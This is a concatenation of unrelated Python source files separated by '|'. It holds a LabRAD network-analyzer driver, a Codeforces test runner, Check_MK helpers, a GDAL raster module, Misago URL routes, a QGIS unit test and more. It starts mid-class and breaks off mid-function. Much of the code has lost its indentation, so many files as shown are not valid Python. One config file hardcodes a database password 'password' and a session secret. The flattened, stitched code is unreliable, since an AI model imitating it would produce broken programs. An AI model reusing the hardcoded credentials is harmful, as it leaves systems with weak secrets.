dev = self.selectedDevice(c)
if count is None:
resp = yield dev.query('SENSe1:AVER:COUN?')
count = int(float(resp))
else:
yield dev.write('SENSe1:AVER:COUN %d' %count)
returnValue(count)
@setting(611, 'Source Power', pow='v[dBm]', returns='v[dBm]')
def source_power(self, c, pow=None):
"""Set or get source RF power."""
dev = self.selectedDevice(c)
if pow is None:
resp = yield dev.query('SOURce:POWer?')
pow = float(resp) * units.dBm
else:
yield dev.write('SOURce:POW1 %f' %pow['dBm'])
returnValue(pow)
@setting(612, 'Get Sweep Time', returns='v[s]')
def get_sweep_time(self, c):
"""Get the time to complete a sweep."""
dev = self.selectedDevice(c)
resp = yield dev.query('SENSe1:SWEep:TIME?')
swpTime = float(resp) * units.s
returnValue(swpTime)
@setting(613, 'Sweep Points', points='w', returns='w')
def sweep_points(self, c, points=None):
"""Set or get the number of points in the sweep."""
dev = self.selectedDevice(c)
if points is None:
resp = yield dev.query('SENSe1:SWEep:POINts?')
points = int(float(resp))
else:
yield dev.write('SENSe1:SWEep:POINts %i'%points)
returnValue(points)
@setting(614, 'Measurement Setup', meas='s')
def measurement_setup(self, c, meas='S21'):
"""
Set the measurement parameters. Use a string of the form Sxx
(S21, S11...) for the measurement type.
"""
if meas not in ('S11', 'S12', 'S13', 'S14', 'S21', 'S22', 'S23',
'S24', 'S31', 'S32', 'S33', 'S34', 'S41', 'S42', 'S43',
'S44'):
            raise ValueError('Illegal measurement definition: %s'
                             %str(meas))
dev = self.selectedDevice(c)
yield dev.write('CALC:PAR:DEL:ALL')
yield dev.write('DISPlay:WINDow1:STATE ON')
yield dev.write('CALCulate:PARameter:DEFine:EXT "MyMeas",%s'
%meas)
yield dev.write('DISPlay:WINDow1:TRACe1:FEED "MyMeas"')
yield dev.write('CALC:PAR:SEL "MyMeas"')
yield dev.write('SENSe1:SWEep:TIME:AUTO ON')
yield dev.write('TRIG:SOUR IMM')
@setting(615, 'Get Trace', returns='*v[dB]')
def get_trace(self, c):
"""Get the active trace from the network analyzer."""
dev = self.selectedDevice(c)
meas = yield dev.query('SYST:ACT:MEAS?')
yield dev.write('CALC:PAR:SEL %s' %meas)
yield dev.write('FORM ASCii,0')
avgMode = yield self.average_mode(c)
if avgMode:
avgCount = yield self.average_points(c)
yield self.restart_averaging(c)
yield dev.write('SENS:SWE:GRO:COUN %i' %avgCount)
yield dev.write('SENS:SWE:MODE GRO')
else:
yield dev.write('ABORT;:INITIATE:IMMEDIATE')
# Wait for the measurement to finish.
yield dev.query('*OPC?')
ascii_data = yield dev.query('CALC1:DATA? FDATA')
data = numpy.array([x for x in ascii_data.split(',')],
dtype=float)
returnValue(data.astype(float))
@setting(616, 'Get S2P', ports='(w, w)', returns=('*(v[Hz], ' +
'v[dB], v[deg], v[dB], v[deg], v[dB], v[deg], v[dB], ' +
'v[deg])'))
def get_s2p(self, c, ports=(1, 2)):
"""Get the scattering parameters from the network analyzer
in the S2P format. The input parameter should be a tuple that
specifies two network analyzer ports, e.g. (1, 2).
Available ports are 1, 2, 3, and 4. The data are returned as
a list of tuples in the following format:
*(frequency,
S[ports[0],ports[0]], Phase[ports[0], ports[0]],
S[ports[1],ports[0]], Phase[ports[1], ports[0]],
S[ports[0],ports[1]], Phase[ports[0], ports[1]],
        S[ports[1],ports[1]], Phase[ports[1], ports[1]]).
"""
if len(ports) != 2:
raise Exception("Two and only two ports should be " +
"specified.")
for port in ports:
if port < 1 or port > 4:
raise Exception("Port number could be only '1', '2', " +
"'3', or '4'.")
if ports[0] == ports[1]:
raise Exception("Port numbers should not be equal.")
dev = self.selectedDevice(c)
meas = yield dev.query('SYST:ACT:MEAS?')
yield dev.write('CALC:PAR:SEL %s' %meas)
yield dev.write('FORM ASCii,0')
avgMode = yield self.average_mode(c)
if avgMode:
avgCount = yield self.average_points(c)
yield self.restart_averaging(c)
yield dev.write('SENS:SWE:GRO:COUN %i' %avgCount)
yield dev.write('SENS:SWE:MODE GRO')
else:
yield dev.write('ABORT;:INITIATE:IMMEDIATE')
# Wait for the measurement to finish.
yield dev.query('*OPC?')
ascii_data = yield dev.query("CALC:DATA:SNP:PORT? '%i, %i'"
%ports)
data = numpy.array([x for x in ascii_data.split(',')],
dtype=float)
length = numpy.size(data) / 9
data = data.reshape(9, length)
data = [(data[0, k] * units.Hz,
data[1, k] * units.dB, data[2, k] * units.deg,
data[3, k] * units.dB, data[4, k] * units.deg,
data[5, k] * units.dB, data[6, k] * units.deg,
data[7, k] * units.dB, data[8, k] * units.deg)
for k in range(length)]
returnValue(data)
@setting(599, 'Initialize')
def initialize(self, c):
"""Initialize the network analyzer."""
dev = self.selectedDevice(c)
yield self.preset(c)
__server__ = AgilentN5230AServer()
if __name__ == '__main__':
from labrad import util
util.runServer(__server__)
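# Usage sketch from a LabRAD client (assumes a running LabRAD manager and
# GPIB bus server; the connection details are illustrative):
#   import labrad
#   cxn = labrad.connect()
#   pna = cxn.agilent_n5230a_network_analyzer
#   pna.select_device()
#   pna.measurement_setup('S21')
#   trace = pna.get_trace()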
|
class Knowledge:
def __init__(self):
self.knowings = {}
def add(self, what, key, value):
if what not in self.knowings:
self.knowings[what] = {}
self.knowings[what][key] = value
    def remove(self, what, key):
        if what in self.knowings:
            # pop() avoids a KeyError when the key is not present
            self.knowings[what].pop(key, None)
    def get(self, what, key=None):
        if key is None:
            return self.knowings.get(what, {})
        else:
            if what not in self.knowings:
                return None
            # Return None if the value does not exist.
            return self.knowings[what].get(key)
def __str__(self):
s = "<know: " + str(self.knowings)
return s + ">\n"
|
import os
import ycm_core
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# '-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x',
'c++',
'-isystem',
'../BoostParts',
'-isystem',
'/System/Library/Frameworks/Python.framework/Headers',
'-isystem',
'../llvm/include',
'-isystem',
'../llvm/tools/clang/include',
'-I',
'.',
'-I',
'./ClangCompleter',
'-isystem',
'./tests/gmock/gtest',
'-isystem',
'./tests/gmock/gtest/include',
'-isystem',
'./tests/gmock',
'-isystem',
'./tests/gmock/include',
'-I',
'/home/shenyunhang/Documents/caffe/include/'
]
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
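# For example:
#   MakeRelativePathsInFlagsAbsolute(['-I', 'include'], '/home/user/project')
#   -> ['-I', '/home/user/project/include']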
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
'''
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
'''
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
import test.configure
|
import argparse
import sys
import os
import httplib
import time
from subprocess import call
from HTMLParser import HTMLParser
class asciicolors:
RESET = "\033[0m"
BLACK = "\033[30m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BLUE = "\033[34m"
MAGENTA = "\033[35m"
CYAN = "\033[36m"
WHITE = "\033[37m"
BOLDBLACK = "\033[1m\033[30m"
BOLDRED = "\033[1m\033[31m"
BOLDGREEN = "\033[1m\033[32m"
BOLDYELLOW = "\033[1m\033[33m"
BOLDBLUE = "\033[1m\033[34m"
BOLDMAGENTA = "\033[1m\033[35m"
BOLDCYAN = "\033[1m\033[36m"
BOLDWHITE = "\033[1m\033[37m"
if not os.path.exists('.local_cache'):
os.mkdir('.local_cache')
parser = argparse.ArgumentParser(
prog = 'cfcl',
description = 'Codeforces command line toolchain')
parser.add_argument('--pid')
contest_id = -1
try:
contest_id = open('.local_cache/contest.cfg', 'r').read()
except (IOError, OSError):
pass
parser.add_argument('--cid')
parser.add_argument('--test',
dest='test',
action='store_const',
const='True',
default='False')
parser.add_argument('-p',
dest='pid')
parser.add_argument('-c',
dest='cid')
parser.add_argument('-t',
dest='test',
action='store_const',
const='True',
default='False')
parser.add_argument('tests_subset',
metavar='tests', type=int, nargs='*', default=[])
args = parser.parse_args()
tests_subset = args.tests_subset
run_tests = args.test
problem_id = args.pid
if args.cid:
contest_id = args.cid
if contest_id:
open('.local_cache/contest.cfg', 'w').write(contest_id)
if not contest_id:
print "Please provide contest id via --cid flag"
exit()
if not problem_id:
print "Please choose problem [A, B, C, D, E] to work with via --pid flag"
exit()
if problem_id not in {'A', 'B', 'C', 'D', 'E'}:
    print "Please provide a correct problem id (A, B, C, D, E); got: %s" % problem_id
exit()
if run_tests == 'False':
os.system('rm a.out; g++ -O2 -DSHTRIX %s.cpp; ./a.out' % problem_id)
exit()
total_time_elapsed = time.time()
print "Running %s%s problem, expecting source filename %s.cpp" % (
contest_id, problem_id, problem_id)
local_cache = '.local_cache/cached%sx%s' % (contest_id, problem_id)
if not os.path.exists(local_cache):
cf_template = "/contest/%s/problem/%s"
url = cf_template % (contest_id, problem_id)
h = httplib.HTTPConnection('codeforces.com', timeout=1)
cnt = 0
while cnt < 10:
try:
h.request('GET', url)
response = h.getresponse()
except Exception as e:
print e
exit()
if response.status != 200:
print "Error occured while connecting by url: %s" % url
cnt += 1
else:
break
    if cnt == 10:
        print "Unable to connect to codeforces."
        exit()
page = response.read()
class SampleParser(HTMLParser):
results = []
current = []
stack = []
search_tag = ""
read_now = False
def __init__(self, _search_tag):
self.results = []
self.current = []
self.stack = []
self.read_now = False
self.search_tag = _search_tag
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if self.read_now:
self.stack.append(tag)
for (x, y) in attrs:
if x == 'class' and y == self.search_tag:
self.read_now = True
self.stack.append(tag)
def handle_endtag(self, tag):
if self.stack and self.stack[-1] == tag:
self.stack.pop()
if len(self.stack) == 0 and self.read_now:
self.read_now = False
self.results.append('\n'.join(self.current))
self.current = []
def handle_data(self, data):
if self.read_now:
if self.stack and self.stack[-1] == 'pre':
self.current.append(data)
def feedx(self, str):
self.feed(str)
return self.results
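    # SampleParser('input').feedx(page) collects the text inside every <pre>
    # element under a tag with class="input" (the sample tests on a
    # Codeforces problem page); SampleParser('output') does the same for
    # the expected outputs.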
inputs = SampleParser('input').feedx(page)
outputs = SampleParser('output').feedx(page)
if len(inputs) != len(outputs):
print "ooops... something went wrong while parsing input/output"
print "check if problem input/output doesn't \
contain special characters e.g. '<'"
exit()
open(local_cache, 'w').write(str(len(inputs)))
for i in xrange(0, len(inputs)):
open('.local_cache/%sx%s%d.in' % (contest_id, problem_id, i), 'w').write(inputs[i])
open('.local_cache/%sx%s%d.out' % (contest_id, problem_id, i), 'w').write(outputs[i].strip())
testcases_num = open(local_cache, 'r').read()
try:
testcases_num = int(testcases_num)
except ValueError:
print "wrong format for file %s" % local_cache
exit()
testcases = []
for i in xrange(0, testcases_num):
testcases.append(
(i,
open('.local_cache/%sx%s%d.in' % (contest_id, problem_id, i)).read(),
open('.local_cache/%sx%s%d.out' % (contest_id, problem_id, i)).read()
)
)
compilation_line = 'rm a.out; g++ -O2 -DONLINE_JUDGE %s.cpp' % problem_id
ret = os.system(compilation_line)
if ret:
exit()
def shift_tab(answer):
return '\n'.join([('\t%s' % x) for x in answer.split('\n') if x])
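# For example, shift_tab("a\nb") -> "\ta\n\tb"; empty lines are dropped.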
for (id, input, output) in testcases:
if not tests_subset or id in tests_subset:
open('testcase.in', 'w').write(input)
time_elapsed = time.time()
os.system('./a.out < testcase.in > testcase.out')
time_elapsed = time.time() - time_elapsed
answer = open('testcase.out', 'r').read().strip()
if answer == output:
print "%s[%d] %sPASSED%s (in %.2lf seconds)" % (
asciicolors.BOLDMAGENTA, id, asciicolors.GREEN, asciicolors.RESET, time_elapsed)
else:
print "%s[%d] %sFAILED%s" % (
asciicolors.BOLDMAGENTA, id, asciicolors.RED, asciicolors.RESET)
print shift_tab("Received:")
print shift_tab(shift_tab(answer))
print shift_tab("Expected:")
print shift_tab(shift_tab(output))
total_time_elapsed = time.time() - total_time_elapsed
print "Finished executing script in %.3lf" % total_time_elapsed
|
'''
Default configurations.
'''
configs = {
'db': {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': 'password',
'database': 'weixin'
},
'session': {
'secret': 'hustraiet'
}
}
|
import grp, defaults, pprint, os, errno, gettext, marshal, fcntl, __builtin__
nagios_state_names = { -1: "NODATA", 0: "OK", 1: "WARNING", 2: "CRITICAL", 3: "UNKNOWN", 4: "DEPENDENT" }
nagios_short_state_names = { -1: "PEND", 0: "OK", 1: "WARN", 2: "CRIT", 3: "UNKN", 4: "DEP" }
nagios_short_host_state_names = { 0: "UP", 1: "DOWN", 2: "UNREACH" }
class MKGeneralException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return str(self.reason)
class MKAuthException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return str(self.reason)
class MKUnauthenticatedException(MKGeneralException):
pass
class MKConfigError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class MKUserError(Exception):
def __init__(self, varname, msg):
self.varname = varname
self.message = msg
Exception.__init__(self, msg)
class MKInternalError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def make_nagios_directory(path):
if not os.path.exists(path):
parent_dir, lastpart = path.rstrip('/').rsplit('/', 1)
make_nagios_directory(parent_dir)
try:
os.mkdir(path)
gid = grp.getgrnam(defaults.www_group).gr_gid
os.chown(path, -1, gid)
os.chmod(path, 0770)
except Exception, e:
            raise MKConfigError("Your web server cannot create the directory <tt>%s</tt>, "
                "or cannot set the group to <tt>%s</tt>, or cannot set the permissions to <tt>0770</tt>. "
                "Please make sure that:<ul><li>the base directory is writable by the web server,</li>"
                "<li>both Nagios and the web server are in the group <tt>%s</tt>.</li></ul>Reason: %s" % (
                path, defaults.www_group, defaults.www_group, e))
def make_nagios_directories(name):
head, tail = os.path.split(name)
if not tail:
head, tail = os.path.split(head)
if head and tail and not os.path.exists(head):
try:
make_nagios_directories(head)
        except OSError, e:
# be happy if someone already created the path
if e.errno != errno.EEXIST:
raise
if tail == ".": # xxx/newdir/. exists if xxx/newdir exists
return
make_nagios_directory(name)
def create_user_file(path, mode):
f = file(path, mode, 0)
gid = grp.getgrnam(defaults.www_group).gr_gid
    # Tackle a known problem: if the file is owned by the nagios user, the
    # web user can write it but cannot change its group. In that case we
    # assume the group is already correct and ignore the error.
try:
os.chown(path, -1, gid)
os.chmod(path, 0660)
except:
pass
return f
def write_settings_file(path, content):
create_user_file(path, "w").write(pprint.pformat(content) + "\n")
def savefloat(f):
try:
return float(f)
except:
return 0.0
def load_web_plugins(forwhat, globalvars):
plugins_path = defaults.web_dir + "/plugins/" + forwhat
fns = os.listdir(plugins_path)
fns.sort()
for fn in fns:
file_path = plugins_path + "/" + fn
if fn.endswith(".py"):
if not os.path.exists(file_path + "c"):
execfile(file_path, globalvars)
elif fn.endswith(".pyc"):
code_bytes = file(file_path).read()[8:]
code = marshal.loads(code_bytes)
exec code in globalvars
if defaults.omd_root:
local_plugins_path = defaults.omd_root + "/local/share/check_mk/web/plugins/" + forwhat
if local_plugins_path != plugins_path: # honor ./setup.sh in site
if os.path.exists(local_plugins_path):
fns = os.listdir(local_plugins_path)
fns.sort()
for fn in fns:
file_path = local_plugins_path + "/" + fn
if fn.endswith(".py"):
execfile(file_path, globalvars)
elif fn.endswith(".pyc"):
code_bytes = file(file_path).read()[8:]
code = marshal.loads(code_bytes)
exec code in globalvars
def get_language_dirs():
dirs = [ defaults.locale_dir ]
if defaults.omd_root:
dirs.append(defaults.omd_root + "/local/share/check_mk/locale")
return dirs
def get_language_alias(lang):
alias = lang
for lang_dir in get_language_dirs():
try:
alias = file('%s/%s/alias' % (lang_dir, lang), 'r').read().strip()
except (OSError, IOError):
pass
return alias
def get_languages():
    # Add the hard-coded English language to the language list.
    # It must remain selectable even if the administrator changed the
    # default language to a custom value.
languages = [ (None, _('English')) ]
for lang_dir in get_language_dirs():
try:
languages += [ (val, get_language_alias(val))
for val in os.listdir(lang_dir) if not '.' in val ]
except OSError:
# Catch "OSError: [Errno 2] No such file or
# directory:" when directory not exists
pass
return languages
def load_language(lang):
# Make current language globally known to all of our modules
__builtin__.current_language = lang
if lang:
locale_base = defaults.locale_dir
local_locale_path = defaults.omd_root + "/local/share/check_mk/locale"
po_path = '/%s/LC_MESSAGES/multisite.mo' % lang
        # Use the file from the local OMD structure if it exists
if os.path.exists(local_locale_path + po_path):
locale_base = local_locale_path
try:
i18n = gettext.translation('multisite', locale_base, languages = [ lang ], codeset = 'UTF-8')
i18n.install(unicode = True)
except IOError, e:
            # Fall back to non-localized multisite. Falling back to the
            # multisite default language would be preferable, but the
            # config module cannot be imported here.
__builtin__.current_language = None
else:
# Replace the _() function to disable i18n again
__builtin__._ = lambda x: x
def pnp_cleanup(s):
return s \
.replace(' ', '_') \
.replace(':', '_') \
.replace('/', '_') \
.replace('\\', '_')
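# e.g. pnp_cleanup('C: Drive/Usage') -> 'C__Drive_Usage'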
def format_exception():
import traceback, StringIO, sys
txt = StringIO.StringIO()
t, v, tb = sys.exc_info()
traceback.print_exception(t, v, tb, None, txt)
return txt.getvalue()
def saveint(x):
try:
return int(x)
except:
return 0
def set_is_disjoint(a, b):
for elem in a:
if elem in b:
return False
return True
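# e.g. set_is_disjoint([1, 2], [3, 4]) -> True; set_is_disjoint([1], [1]) -> False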
g_aquired_locks = []
g_locked_paths = []
def aquire_lock(path):
if path in g_locked_paths:
return # No recursive locking
fd = os.open(path, os.O_RDONLY)
fcntl.flock(fd, fcntl.LOCK_EX)
g_aquired_locks.append(fd)
g_locked_paths.append(path)
def release_all_locks():
global g_aquired_locks, g_locked_paths
for fd in g_aquired_locks:
os.close(fd)
g_aquired_locks = []
g_locked_paths = []
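# --- Hedged usage sketch (not part of the original module) ---
# Illustrates the flock helpers above with a throwaway file; the path is
# hypothetical, and os.open(path, os.O_RDONLY) requires the file to exist.
def _demo_locking():
    demo_path = '/tmp/lock_demo'   # hypothetical path
    open(demo_path, 'a').close()   # make sure the file exists
    aquire_lock(demo_path)         # takes an exclusive flock on the fd
    aquire_lock(demo_path)         # no-op: the path is already locked
    release_all_locks()            # closing the fds drops the locks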
|
from pydynamind import *
import gdal, osr
from gdalconst import *
import struct
class DM_ValueFromRaster(Module):
display_name = "Value From Raster"
group_name = "Network Generation"
def getHelpUrl(self):
return "/DynaMind-GDALModules/dm_value_from_raster.html"
def __init__(self):
Module.__init__(self)
self.setIsGDALModule(True)
self.createParameter("view_name", STRING)
self.view_name = "node"
self.createParameter("attribute_name", STRING)
self.attribute_name = "value"
self.createParameter("raster_file", FILENAME)
self.raster_file = ""
def init(self):
self.node_view = ViewContainer(self.view_name, NODE, READ)
self.node_view.addAttribute(self.attribute_name, Attribute.DOUBLE, WRITE)
self.catchment_view = ViewContainer("city", FACE, READ)
self.registerViewContainers([self.node_view, self.catchment_view])
def run(self):
dataset = gdal.Open( self.raster_file, GA_ReadOnly)
if not dataset:
log("Failed to open file", Error)
self.setStatus(MOD_EXECUTION_ERROR)
return
band = dataset.GetRasterBand(1)
gt = dataset.GetGeoTransform()
srs = osr.SpatialReference()
srs.ImportFromWkt(dataset.GetProjection())
srsLatLong = osr.SpatialReference()
srsLatLong.ImportFromEPSG(self.getSimulationConfig().getCoorindateSystem())
#(353136,5776456)
ct = osr.CoordinateTransformation(srsLatLong, srs)
inMemory = True
if inMemory:
for c in self.catchment_view:
geom = c.GetGeometryRef()
env = geom.GetEnvelope()
p1 = ct.TransformPoint(env[0], env[2])
p2 = ct.TransformPoint(env[1], env[3])
minx = int((p1[0]-gt[0])/gt[1])
miny = int((p1[1]-gt[3])/gt[5])
maxx = int((p2[0]-gt[0])/gt[1])
maxy = int((p2[1]-gt[3])/gt[5])
if miny > maxy:
min_y_tmp = miny
miny = maxy
maxy = min_y_tmp
log("swapsy", Standard)
minx -= 5
miny -= 5
maxx += 5
maxy += 5
print(str(minx) + "/" + str(miny)+ "/" + str(maxx)+ "/" + str(maxy), maxx-minx, maxy-miny)
log(str(minx) + "/" + str(miny)+ "/" + str(maxx)+ "/" + str(maxy), Standard)
values = band.ReadAsArray(minx, miny, maxx-minx, maxy-miny)
for node in self.node_view:
geom = node.GetGeometryRef()
point = ct.TransformPoint(geom.GetX(), geom.GetY())
x = (point[0]-gt[0])/gt[1]
y = (point[1]-gt[3])/gt[5]
if inMemory:
val = values[int(y)-miny][int(x)-minx]
#print val.item()
node.SetField(self.attribute_name, val.item())
else:
datatype = band.DataType
scanline = band.ReadRaster( int(x), int(y), 1, 1, 1, 1, datatype)
if not scanline:
log("No value found for " + str(x) + "," + str(y), Warning)
continue
if datatype == GDT_Int32:
tuple_of_floats = struct.unpack('i' * 1, scanline)
elif datatype == GDT_Float32:
tuple_of_floats = struct.unpack('f' * 1, scanline)
else:
log("Datatype " + str(datatype) + " not supported", Error)
self.node_view.finalise()
return
self.node_view.finalise()
self.catchment_view.finalise()
|
import argparse
import logging
import dedoelen
from dedoelen.core import calendar
from dedoelen.core import scraper
from dedoelen.core import parser
from dedoelen.core import update
from dedoelen.core.conf import settings
from dedoelen.utils.localize import set_locale
from dedoelen.utils.log import init_logger
class Main(object):
def __init__(self):
set_locale()
self.version = dedoelen.get_version()
def parse_cmdline(self):
"""
Parse the commandline arguments. Verbosity is translated as the
logger flushlevel. Two actions are possible: 'init' creates an
entirely new calendar, and 'update' updates an existing one.
"""
argp = argparse.ArgumentParser()
argp.add_argument("action",
help="specify the action to perform (init|update)")
argp.add_argument("-v", "--verbose", action="store_true",
help="increase output verbosity")
argp.add_argument("-l", "--logfile", type=str,
help="logfile to write to")
args = argp.parse_args()
if args.verbose:
init_logger("INFO", logfile=args.logfile)
else:
init_logger("ERROR", logfile=args.logfile)
logger = logging.getLogger(__name__)
if args.action == 'init':
logger.info("Running action initialize")
self.initialize()
elif args.action == 'update':
logger.info("Running action update")
self.update()
else:
raise ValueError("action can be either 'init' or 'update'")
def initialize(self):
"""
Initialize a new calendar.
"""
urls = scraper.scrape_rss()
pages = scraper.scrape_html(urls)
voorstellingen = [parser.html2voorstelling(x) for x in pages]
voorstellingen = [x for x in voorstellingen if x is not None]
cal = calendar.make_calendar(voorstellingen)
self.write_cal(cal)
def update(self):
"""
Update an existing calendar.
"""
urls = scraper.scrape_rss()
pages = scraper.scrape_html(urls)
voorstellingen = [parser.html2voorstelling(x) for x in pages]
voorstellingen = [x for x in voorstellingen if x is not None]
voorstellingen = update.update_voorstellingen(voorstellingen)
cal = calendar.make_calendar(voorstellingen)
self.write_cal(cal)
def write_cal(self, calendar):
"""
Write calendar to file.
:param calendar: calendar object that is written to a file
:type calendar: :class:`icalendar.Calendar`
"""
with open(settings.OUTFILE, "wb") as fid:
fid.write(calendar.to_ical())
def __call__(self):
try:
return self.parse_cmdline()
except KeyboardInterrupt:
print("*** interrupted")
return 2
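# Hedged sketch of a console entry point: the project presumably wires Main up
# elsewhere (e.g. via a setuptools entry point), so this guard is illustrative.
if __name__ == '__main__':
    import sys
    sys.exit(Main()())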
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from misago.admin import ADMIN_PATH, site
urlpatterns = patterns('misago.apps',
url(r'^$', 'index.index', name="index"),
url(r'^read-all/$', 'readall.read_all', name="read_all"),
url(r'^register/$', 'register.views.form', name="register"),
url(r'^attachment/(?P<attachment>[0-9a-zA-Z]{8})/$', 'attachments.server', name="attachments_server"),
url(r'^attachment/thumb/(?P<attachment>[0-9a-zA-Z]{8})/$', 'attachments.server', name="attachments_thumbs_server", kwargs={'thumb': True}),
url(r'^category/(?P<slug>(\w|-)+)-(?P<forum>\d+)/$', 'category.category', name="category"),
url(r'^redirect/(?P<slug>(\w|-)+)-(?P<forum>\d+)/$', 'redirect.redirect', name="redirect"),
url(r'^alerts/$', 'alerts.alerts', name="alerts"),
url(r'^alerts/clear-recent/$', 'alerts.clear_recent', name="alerts_clear_recent"),
url(r'^news/$', 'newsfeed.newsfeed', name="newsfeed"),
url(r'^tos/$', 'tos.tos', name="tos"),
url(r'^markdown/$', 'help.markdown', name="help_md"),
url(r'^forum-map/$', 'forummap.forum_map', name="forum_map"),
url(r'^popular/$', 'popularthreads.popular_threads', name="popular_threads"),
url(r'^popular/(?P<page>[1-9]([0-9]+)?)/$', 'popularthreads.popular_threads', name="popular_threads"),
url(r'^new/$', 'newthreads.new_threads', name="new_threads"),
url(r'^new/(?P<page>[1-9]([0-9]+)?)/$', 'newthreads.new_threads', name="new_threads"),
url(r'^warn-user/(?P<slug>\w+)-(?P<user>\d+)/', 'warnuser.views.warn_user', name="warn_user"),
)
urlpatterns += patterns('',
(r'^', include('misago.apps.signin.urls')),
(r'^users/', include('misago.apps.profiles.urls')),
url(r'^users/(?P<username>\w+)-(?P<user>\d+)/destroy/', 'misago.apps.destroyuser.destroy_user', name="destroy_user"),
(r'^usercp/', include('misago.apps.usercp.urls')),
(r'^activate/', include('misago.apps.activation.urls')),
(r'^watched-threads/', include('misago.apps.watchedthreads.urls')),
(r'^reset-password/', include('misago.apps.resetpswd.urls')),
(r'^private-threads/', include('misago.apps.privatethreads.urls')),
(r'^reports/', include('misago.apps.reports.urls')),
(r'^search/', include('misago.apps.search.urls')),
(r'^', include('misago.apps.threads.urls')),
)
handler403 = 'misago.apps.errors.error403'
handler404 = 'misago.apps.errors.error404'
import warnings
from urlparse import urlparse
if not settings.DEBUG and not urlparse(settings.MEDIA_URL).netloc:
    warnings.warn('Sharing the same domain between the application and user-uploaded media is a security risk. Create a subdomain pointing to your media directory (e.g. "uploads.myforum.com") and change your MEDIA_URL.', RuntimeWarning)
|
"""QGIS Unit tests for QgsClassificationMethod implementations
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Denis Rouzaud'
__date__ = '3/09/2019'
__copyright__ = 'Copyright 2019, The QGIS Project'
import qgis # NOQA
from qgis.PyQt.QtCore import QLocale
from qgis.testing import unittest, start_app
from qgis.core import QgsClassificationMethod, QgsClassificationLogarithmic, QgsFeature, QgsVectorLayer, QgsPointXY, \
QgsGeometry
start_app()
def createMemoryLayer(values):
ml = QgsVectorLayer("Point?crs=epsg:4236&field=id:integer&field=value:double",
"test_data", "memory")
    # values is a list of doubles; each feature gets an auto-incremented id
    # and a point geometry derived from that id
assert ml.isValid()
pr = ml.dataProvider()
fields = pr.fields()
id = 0
for value in values:
id += 1
feat = QgsFeature(fields)
feat['id'] = id
feat['value'] = value
g = QgsGeometry.fromPointXY(QgsPointXY(id / 100, id / 100))
feat.setGeometry(g)
pr.addFeatures([feat])
ml.updateExtents()
return ml
class TestQgsClassificationMethods(unittest.TestCase):
def testQgsClassificationLogarithmic(self):
values = [2746.71,
66667.49,
77282.52,
986567.01,
1729508.41,
9957836.86,
35419826.29,
52584164.80,
296572842.00]
vl = createMemoryLayer(values)
m = QgsClassificationLogarithmic()
r = m.classes(vl, 'value', 8)
self.assertEqual(len(r), 6)
self.assertEqual(r[0].label(), '{} - 10^4'.format(QLocale().toString(2746.71)))
self.assertEqual(QgsClassificationMethod.rangesToBreaks(r),
[10000.0, 100000.0, 1000000.0, 10000000.0, 100000000.0, 1000000000.0])
self.assertEqual(len(m.classes(vl, 'value', 4)), 4)
def testQgsClassificationLogarithmic_FilterZeroNeg(self):
values = [-2, 0, 1, 7, 66, 555, 4444]
vl = createMemoryLayer(values)
m = QgsClassificationLogarithmic()
m.setParameterValues({'FILTER_ZERO_NEG_VALUES': True})
r = m.classes(vl, 'value', 4)
self.assertEqual(len(r), 4)
self.assertEqual(r[0].label(), '1 - 10^1')
self.assertEqual(QgsClassificationMethod.rangesToBreaks(r), [10.0, 100.0, 1000.0, 10000.0])
if __name__ == "__main__":
unittest.main()
|
import globalvar
import simplejson as json
import os
import xbmcgui
def list_shows(channel,folder):
shows=[]
if folder=='none':
